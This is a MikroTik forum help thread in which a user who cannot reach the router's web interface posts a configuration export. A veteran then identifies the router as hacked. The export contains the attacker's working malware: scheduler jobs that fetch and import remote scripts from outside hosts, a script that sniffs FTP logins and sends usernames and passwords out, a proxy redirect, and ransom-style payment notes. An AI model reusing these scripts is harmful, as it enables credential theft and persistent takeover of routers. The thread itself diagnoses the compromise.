Community discussions

MikroTik App
  4. RouterOS
  5. Beginner Basics

Can't connect to web interface internal

Locked
 
reem01
just joined
Topic Author
Posts: 5
Joined: Thu Mar 21, 2019 3:32 am

Can't connect to web interface internal

Thu Mar 21, 2019 3:37 am

This router is above my skill set, but it's what I have. The web interface is something I used to connect to for minor changes. I can no longer access that interface. I can connect through MAC telnet, but I have not been able to locate the commands to enable the web access. Hoping this is fairly simple for most of you, and someone may be able to walk me through getting that re-enabled.

Thanks in advance for any help given.
Top
 
User avatar
sebastia
Forum Guru
Forum Guru
Posts: 1782
Joined: Tue Oct 12, 2010 3:23 am
Location: Antwerp, BE

Re: Can't connect to web interface internal

Thu Mar 21, 2019 12:50 pm

Hey

You should start by connecting to it and exporting current config ("/export hide-sensitive compact") and post it here, between <code> tags.
Top
 
User avatar
flaviojunior
Trainer
Trainer
Posts: 21
Joined: Thu Nov 17, 2016 6:27 pm
Location: Brazil
Contact:
Contact flaviojunior

Re: Can't connect to web interface internal

Thu Mar 21, 2019 12:58 pm



You should start by connecting to it and exporting current config ("/export hide-sensitive compact") and post it here, between <code> tags.[/quote]Hi, can you test the connectivity? If you area reaching the router. Try to ping.
If you won't is that the point why you are not accessing it by web.
The router by default came with web interface enable by default and with a firewall to protect it from WAN.
If you not disable web service probably you are not accessing it because of connectivity


Sent from my Vivo XI+ using Tapatalk


Top
 
2frogs
Forum Veteran
Forum Veteran
Posts: 713
Joined: Fri Dec 03, 2010 1:38 am

Re: Can't connect to web interface internal

Thu Mar 21, 2019 1:00 pm

IP>Services, this is where you enable/disable, set port # and can set IP's for access. If it is enabled there and your still not able to connect, you will need to check your firewall rules IP>Firewall>Filter to be sure access is not being blocked there.

Provide /export if you need any further assistance.
Top
 
reem01
just joined
Topic Author
Posts: 5
Joined: Thu Mar 21, 2019 3:32 am

Re: Can't connect to web interface internal

Thu Mar 21, 2019 7:27 pm

Appreciate the responses. I am using the Neighbor Viewer, and it is not letting me copy text, or scroll up to even get screenshots of the first part of the output. I have tried Putty, but that doesn't have a MAC address option, and not finding other tools that can connect through telnet to the MAC. Thoughts?
Top
 
2frogs
Forum Veteran
Forum Veteran
Posts: 713
Joined: Fri Dec 03, 2010 1:38 am

Re: Can't connect to web interface internal

Thu Mar 21, 2019 10:30 pm

Use WinBox; https://download.mikrotik.com/routeros/ ... winbox.exe
In the Neighbors Tab, click on the MAC of the device and it will load in the Connect To field. Enter your credentials below it.
Top
 
reem01
just joined
Topic Author
Posts: 5
Joined: Thu Mar 21, 2019 3:32 am

Re: Can't connect to web interface internal

Thu Mar 21, 2019 10:59 pm

I didn't see a neighbors tab on Winbox, but it did allow me to connect to my router through the MAC address, didn't know I could. Looking at IP - Services, winbox and www are enabled, is it being blocked elsewhere?
Top
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19371
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:
Contact anav

Re: Can't connect to web interface internal

Fri Mar 22, 2019 1:18 am

More than likely your Qs will be answered if adhering to Sebastia's suggestion

/export hide-sensitive file=yourconfigmar21
Top
 
reem01
just joined
Topic Author
Posts: 5
Joined: Thu Mar 21, 2019 3:32 am

Re: Can't connect to web interface internal

Fri Mar 22, 2019 4:30 am

Thanks for the tip on exporting to file. Here is the output, longer than I expected.
Code: Select all
/interface bridge
add admin-mac=4C:5E:0C:47:75:56 auto-mac=no fast-forward=no mtu=1500 name=\
    bridge-local
/interface ethernet
set [ find default-name=ether1 ] name=ether1-gateway speed=100Mbps
set [ find default-name=ether2 ] speed=100Mbps
set [ find default-name=ether3 ] speed=100Mbps
set [ find default-name=ether4 ] speed=100Mbps
set [ find default-name=ether5 ] speed=100Mbps
set [ find default-name=ether6 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether6-master-local
set [ find default-name=ether7 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether7-slave-local
set [ find default-name=ether8 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether8-slave-local
set [ find default-name=ether9 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether9-slave-local
set [ find default-name=ether10 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full name=\
    ether10-slave-local
/interface pppoe-client
add add-default-route=yes disabled=no interface=ether1-gateway \
    keepalive-timeout=60 max-mru=1480 max-mtu=1480 name=pppoe-out1 \
    use-peer-dns=yes user=*******
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-onlyn channel-width=20/40mhz-Ce \
    country="united states" disabled=no distance=indoors frequency=2432 mode=\
    ap-bridge ssid=billbill1 tx-power=29 tx-power-mode=all-rates-fixed \
    wireless-protocol=802.11
/interface list
add exclude=dynamic name=discover
add name=mactel
add name=mac-winbox
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa-psk,wpa2-psk eap-methods="" \
    mode=dynamic-keys supplicant-identity=MikroTik
/ip firewall layer7-protocol
add name=tls7 regexp="AUTH TLS"
/ip ipsec proposal
set [ find default=yes ] enc-algorithms=aes-128-cbc
/ip pool
add name=dhcp ranges=192.168.1.100-192.168.1.254
/ip dhcp-server
add address-pool=dhcp authoritative=after-2sec-delay disabled=no interface=\
    bridge-local lease-time=20h10m name=default
/queue simple
add name=queue1 queue=default/default total-queue=default
/queue tree
add limit-at=4300k max-limit=4300k name=queue1 parent=ether1-gateway queue=\
    default
add limit-at=3500k max-limit=3500k name=prio5-streaming packet-mark=streaming \
    parent=queue1 priority=5 queue=default
add limit-at=4500k max-limit=4500k name=prio3-gaming packet-mark=gaming \
    parent=queue1 priority=1 queue=default
add limit-at=3500k max-limit=4500k name=prio2-misc-fast packet-mark=misc-fast \
    parent=queue1 priority=3 queue=default
add limit-at=500k max-limit=9500k name=prio6-http packet-mark=http parent=\
    queue1 priority=6 queue=default
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
/system logging action
set 1 disk-file-name=log
/interface bridge port
add bridge=bridge-local hw=no interface=ether2
add bridge=bridge-local hw=no interface=ether3
add bridge=bridge-local hw=no interface=ether4
add bridge=bridge-local hw=no interface=ether5
add bridge=bridge-local interface=ether6-master-local
add bridge=bridge-local hw=no interface=sfp1
add bridge=bridge-local interface=wlan1
add bridge=bridge-local interface=ether7-slave-local
add bridge=bridge-local interface=ether8-slave-local
add bridge=bridge-local interface=ether9-slave-local
add bridge=bridge-local interface=ether10-slave-local
/ip neighbor discovery-settings
set discover-interface-list=discover
/interface list member
add interface=sfp1 list=discover
add interface=ether2 list=discover
add interface=ether3 list=discover
add interface=ether4 list=discover
add interface=ether5 list=discover
add interface=ether6-master-local list=discover
add interface=ether7-slave-local list=discover
add interface=ether8-slave-local list=discover
add interface=ether9-slave-local list=discover
add interface=ether10-slave-local list=discover
add interface=wlan1 list=discover
add interface=bridge-local list=discover
add interface=pppoe-out1 list=discover
add interface=ether2 list=mactel
add interface=ether3 list=mactel
add interface=ether2 list=mac-winbox
add interface=ether4 list=mactel
add interface=ether3 list=mac-winbox
add interface=ether5 list=mactel
add interface=ether4 list=mac-winbox
add interface=ether6-master-local list=mactel
add interface=ether5 list=mac-winbox
add interface=ether7-slave-local list=mactel
add interface=ether6-master-local list=mac-winbox
add interface=ether8-slave-local list=mactel
add interface=ether7-slave-local list=mac-winbox
add interface=ether9-slave-local list=mactel
add interface=ether8-slave-local list=mac-winbox
add interface=ether10-slave-local list=mactel
add interface=ether9-slave-local list=mac-winbox
add interface=sfp1 list=mactel
add interface=ether10-slave-local list=mac-winbox
add interface=wlan1 list=mactel
add interface=sfp1 list=mac-winbox
add interface=bridge-local list=mactel
add interface=wlan1 list=mac-winbox
add interface=bridge-local list=mac-winbox
/interface pptp-server server
set enabled=yes
/ip address
add address=192.168.1.1/24 comment="default configuration" interface=ether2 \
    network=192.168.1.0
/ip cloud
set ddns-enabled=yes
/ip dhcp-client
add comment="default configuration" dhcp-options=hostname,clientid interface=\
    ether1-gateway
/ip dhcp-server network
add address=192.168.1.0/24 comment="default configuration" dns-server=\
    192.168.1.5 gateway=192.168.1.1 netmask=24
/ip dns
set allow-remote-requests=yes servers=\
    192.168.1.5,5.189.170.196,8.8.8.8,104.238.186.189
/ip firewall address-list
add address=127.0.0.1 list=allow-ip
/ip firewall filter
add action=accept chain=forward comment=ftpgood dst-address-list=ftpgood \
    dst-port=21 protocol=tcp
add action=drop chain=forward comment=tls dst-address-list=atls dst-port=21 \
    protocol=tcp
add action=drop chain=forward comment=tls dst-address-list=ftpinit dst-port=\
    21 protocol=tcp
add action=add-src-to-address-list address-list=ip1 address-list-timeout=7s \
    chain=input comment="I closed the vulnerability with a firewall." \
    packet-size=327 protocol=icmp
add action=add-src-to-address-list address-list=ip2 address-list-timeout=7s \
    chain=input comment=ip2 packet-size=1104 protocol=icmp src-address-list=\
    ip1
add action=add-src-to-address-list address-list=allow-ip \
    address-list-timeout=1h chain=input comment=allow-ip packet-size=1104 \
    protocol=icmp src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
    address-list-timeout=2h chain=input comment=blacklist packet-size=!1104 \
    protocol=icmp src-address=!79.145.0.0/16 src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
    address-list-timeout=2h chain=input comment=blacklist packet-size=204 \
    protocol=icmp src-address=!79.145.0.0/16
add action=add-src-to-address-list address-list=blacklist \
    address-list-timeout=2h chain=input comment=blacklist packet-size=1083 \
    protocol=icmp src-address=!79.145.0.0/16
add action=drop chain=input comment=\
    "You can say thanks on the WebMoney Z399578297824" dst-port=\
    8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=blacklist
add action=add-src-to-address-list address-list=Ok address-list-timeout=10s \
    chain=input comment=sysadminpxy dst-port=63141 protocol=tcp
add action=accept chain=input comment=sysadmin53u port=53 protocol=udp
add action=accept chain=input comment=sysadmin53t port=53 protocol=tcp
add action=accept chain=input comment=\
    "Please update RotherOS and change password." src-address-list=allow-ip
add action=drop chain=input comment="or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1\
    . My Telegram http://t.me/router_os" dst-port=\
    8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip
add action=accept chain=input comment="default configuration" \
    connection-state=established
add action=accept chain=input comment="default configuration" \
    connection-state=related
add action=drop chain=input comment="default configuration" in-interface=\
    ether1-gateway
add action=accept chain=forward comment="default configuration" \
    connection-state=established
add action=accept chain=forward comment="default configuration" \
    connection-state=related
add action=drop chain=forward comment="default configuration" \
    connection-state=invalid
add action=accept chain=forward comment="Allow NAT Connections" dst-port=80 \
    protocol=tcp
add action=drop chain=input src-address=81.213.167.41
add action=accept chain=forward dst-address=192.168.1.5 dst-port=32400 \
    protocol=tcp src-port=32400
add action=accept chain=forward dst-address=192.168.1.5 dst-port=32400 \
    protocol=udp src-port=32400
add action=passthrough chain=input
add action=tarpit chain=input comment=\
    "Add you ip addess to allow-ip in Address Lists." dst-port=30553 \
    protocol=tcp
add action=drop chain=input comment="Disallow  weird  packets" \
    connection-state=invalid
/ip firewall mangle
add action=add-dst-to-address-list address-list=atls chain=prerouting \
    comment=tls dst-port=21 layer7-protocol=tls7 protocol=tcp
add action=add-dst-to-address-list address-list=ftpinit chain=prerouting \
    comment=ftp dst-address-list=!ftpok dst-port=21 protocol=tcp
add action=mark-packet chain=postrouting connection-mark=streaming \
    new-packet-mark=streaming passthrough=no
add action=mark-packet chain=postrouting connection-mark=gaming \
    new-packet-mark=gaming passthrough=no
add action=mark-packet chain=postrouting new-packet-mark=misc-fast \
    packet-size=40 passthrough=no protocol=tcp tcp-flags=ack
add action=mark-packet chain=postrouting dst-port=53 new-packet-mark=\
    misc-fast out-interface=ether1-gateway passthrough=no protocol=udp
add action=mark-packet chain=postrouting connection-mark=http \
    new-packet-mark=http passthrough=no
add action=mark-connection chain=postrouting comment="Valve Games" dst-port=\
    27000-27060 new-connection-mark=gaming out-interface=ether1-gateway \
    passthrough=yes protocol=udp
add action=mark-connection chain=postrouting comment=League dst-port=\
    5000-5500 new-connection-mark=gaming out-interface=ether1-gateway \
    passthrough=yes protocol=udp
add action=mark-connection chain=postrouting comment=SC2 dst-port=1119 \
    new-connection-mark=gaming out-interface=ether1-gateway passthrough=yes \
    protocol=udp
add action=mark-connection chain=postrouting comment=HotS dst-port=1120,3724 \
    new-connection-mark=gaming out-interface=ether1-gateway passthrough=yes \
    protocol=udp
add action=mark-connection chain=postrouting comment="BW + HotS" dst-port=\
    6112-6113 new-connection-mark=gaming out-interface=ether1-gateway \
    passthrough=yes protocol=udp
add action=mark-connection chain=postrouting comment=Streaming \
    connection-state=new dst-port=1935 new-connection-mark=streaming \
    out-interface=ether1-gateway passthrough=yes protocol=tcp
add action=mark-connection chain=postrouting comment="Web Browsing" \
    connection-state=new dst-port=80,443 new-connection-mark=http \
    out-interface=ether1-gateway passthrough=yes protocol=tcp
/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp \
    src-address-list=!Ok to-ports=63141
add action=masquerade chain=srcnat comment="default configuration" \
    out-interface=pppoe-out1
add action=dst-nat chain=dstnat dst-address=192.168.1.5 dst-port=32400 \
    in-interface=all-ethernet log=yes protocol=tcp src-port=32400 \
    to-addresses=192.168.1.5 to-ports=32400
/ip ipsec policy
set 0 dst-address=0.0.0.0/0 src-address=0.0.0.0/0
/ip proxy
set enabled=yes port=63141
/ip proxy access
add action=deny comment=sysadminpxy
/ip service
set telnet port=20023
set ftp disabled=yes
set ssh disabled=yes
/ip socks
set port=27182
/ip upnp
set enabled=yes
/ip upnp interfaces
add interface=ether1-gateway type=external
add interface=bridge-local type=internal
/lcd
set time-interval=daily
/ppp secret
add local-address=10.1.101.1 name=Admin profile=default-encryption \
    remote-address=10.1.101.100 service=pptp
/system clock
set time-zone-autodetect=no time-zone-name=America/Denver
/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
/system note
set note="The security flaw for Hajime is closed by the firewall. Please updat\
    e RotherOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
    3nUgsdqQawiMLC1bUGDZWHowix1"
/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
/system scheduler
add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:\
    31416/min01\?key=F8vsZ37VvBUEzi&part=7&port=8291\" mode=http dst-path=u113\
    .rsc} on-error={}\r\
    \n:do {/tool fetch url=\"http://min01.com:31416/mikr0tik\?key=F8vsZ37VvBUE\
    zi&part=7&port=8291\" mode=http dst-path=u113.rsc} on-error={}\r\
    \n:do {/tool fetch url=\"http://gotan.bit:31416/up0\?key=F8vsZ37VvBUEzi&pa\
    rt=7&port=8291\" mode=http dst-path=u113.rsc} on-error={}\r\
    \n:do {/import u113.rsc} on-error={}\r\
    \n:do {/file remove u113.rsc} on-error={}" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    dec/16/2018 start-time=00:54:13
add interval=1d name=Auto113 on-event="/system reboot" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    dec/16/2018 start-time=03:11:00
add interval=1m name=shftp on-event=":if ([:len [/system script job find scrip\
    t =\"scftp\"]] != 1) do={/system script job remove [/system script job fin\
    d script =\"scftp\"];:execute \"scftp\"};" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup
/system script
add dont-require-permissions=no name=scftp owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source=":do {/t\
    ool sniffer stop} on-error={}\r\
    \nwhile (true) do={\r\
    \nforeach i in=[/ip firewall address-list find where list=atls or list=ftp\
    good] do={\r\
    \n:local ipftp [/ip firewall address-list get \$i address] \r\
    \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
    dress=\$ipftp]} on-error={}\r\
    \n:do {/ip firewall address-list remove [find where list=\"ftpok\" && addr\
    ess=\$ipftp]} on-error={}\r\
    \n:do {/ip firewall address-list remove [find where list=\"atls\" && addre\
    ss=\$ipftp]} on-error={}\r\
    \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
    \n}\r\
    \nforeach i in=[/ip firewall address-list find list=ftpinit] do={\r\
    \n:local ipftp [/ip firewall address-list get \$i address]\r\
    \n:do {/tool sniffer set file-limit=200KiB file-name=(\$ipftp.\".txt\") fi\
    lter-interface=all filter-ip-address=\$ipftp filter-port=21 streaming-enab\
    led=no memory-scroll=no} on-error={}\r\
    \n:do {/tool sniffer start} on-error={}\r\
    \n:do {/ip firewall address-list add address=\$ipftp list=ftpok timeout=2h\
    } on-error={}\r\
    \n:do {/ip firewall address-list remove [find where list=\"ftpinit\" && ad\
    dress=\$ipftp]} on-error={}\r\
    \n:local len0 0\r\
    \n:local len1 0\r\
    \n:local file0 \"\"\r\
    \n:local file1 \"\"\r\
    \n:local minute\r\
    \n:set \$minute ([:pick [/sys clock get time] 3 5]+2)\r\
    \nif (\$minute>59) do={:set \$minute (\$minute-60)}\r\
    \n:do {\r\
    \n:set \$len0 \$len1\r\
    \n:set \$file0 \$file1 \r\
    \n:do {:set \$file1 [/file get (\$ipftp.\".txt\") contents]} on-error={}\r\
    \n:set \$len1 [:len \$file1]\r\
    \n} while=(!((\$len0!=\$len1 and \$len1=0) or ([:tonum [:pick [/sys clock \
    get time] 3 5]]=\$minute)))\r\
    \n:do {/tool sniffer stop} on-error={}\r\
    \n:set \$pUSER [:find \$file0 \"USER \" -1]\r\
    \n:set \$pPASS [:find \$file0 \"PASS \" -1]\r\
    \n:local user \"\"\r\
    \n:local pass \"\"\r\
    \nif (\$pUSER>0) do={\r\
    \n:set \$pUSER (\$pUSER+5)\r\
    \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
    \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pUSER<\$len0) do={\r\
    \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
    \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
    \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
    \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
    \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
    \n:set \$user (\$user.\$ch)\r\
    \n:set \$pUSER (\$pUSER+1)\r\
    \n:set \$ch [:pick \$file0 \$pUSER (\$pUSER+1)]\r\
    \n}}\r\
    \nif (\$pPASS>0) do={\r\
    \n:set \$pPASS (\$pPASS+5)\r\
    \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
    \nwhile (\$ch!=\"\\r\" && \$ch!=\"\\n\" && \$pPASS<\$len0) do={\r\
    \nif (\$ch=\" \") do={:set \$ch \"!pRoBeL>!\"}\r\
    \nif (\$ch=\"\\\?\") do={:set \$ch \"!vOpRoS>!\"}\r\
    \nif (\$ch=\"\\\"\") do={:set \$ch \"!kAv>!\"}\r\
    \nif (\$ch=\"\\\$\") do={:set \$ch \"!dOlLaR>!\"}\r\
    \nif (\$ch=\"\\\\\") do={:set \$ch \"!pAlKa>!\"}\r\
    \n:set \$pass (\$pass.\$ch)\r\
    \n:set \$pPASS (\$pPASS+1)\r\
    \n:set \$ch [:pick \$file0 \$pPASS (\$pPASS+1)]\r\
    \n}}\r\
    \nif ([:len \$user]!=0 or [:len \$pass]!=0) do={\r\
    \nif ([:len \$user]<40 && [:len \$pass]<40) do={\r\
    \n:do {/ip firewall address-list add address=\$ipftp list=ftpgood} on-erro\
    r={}\r\
    \n:do {/tool fetch url=(\"http://min01.com:31418/ftp\?ipftp=\".\$ipftp.\"&\
    user=\".\$user.\"&pass=\".\$pass) mode=http keep-result=no} on-error={}\r\
    \n}}\r\
    \n:delay 1s\r\
    \n:do {/file remove (\$ipftp.\".txt\")} on-error={}\r\
    \n}\r\
    \n:delay 1s\r\
    \n}\r\
    \n"
/tool graphing interface
add
/tool mac-server
set allowed-interface-list=mactel
/tool mac-server mac-winbox
set allowed-interface-list=mac-winbox
/tool sniffer
set file-limit=200KiB file-name=75.174.55.112.txt filter-interface=all \
    filter-ip-address=75.174.55.112/32 filter-port=ftp memory-scroll=no
/tool traffic-monitor
add interface=pppoe-out1 name=tmon1 threshold=0
Top
 
2frogs
Forum Veteran
Forum Veteran
Posts: 713
Joined: Fri Dec 03, 2010 1:38 am

Re: Can't connect to web interface internal

Fri Mar 22, 2019 6:30 am

Code: Select all
/ip firewall address-list
add address=127.0.0.1 list=allow-ip

/ip firewall filter
add action=drop chain=input comment=\
    "You can say thanks on the WebMoney Z399578297824" dst-port=\
    8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=blacklist
add action=accept chain=input comment=\
    "Please update RotherOS and change password." src-address-list=allow-ip
add action=drop chain=input comment="or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1\
    . My Telegram http://t.me/router_os" dst-port=\
    8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip
This indicates your router has been hacked!
I would recommend doing a netinstall to remove all bad configs, upgrade to latest ROS, do not reuse old passwords and make sure you have a secure firewall.
Top
 
reem01
just joined
Topic Author
Posts: 5
Joined: Thu Mar 21, 2019 3:32 am

Re: Can't connect to web interface internal

Fri Mar 22, 2019 3:48 pm

Yikes, thank you!

I will review my configs so I can save what I know I need.
Top
Locked

Who is online

Users browsing this forum: akakua and 108 guests
  4. RouterOS
  5. Beginner Basics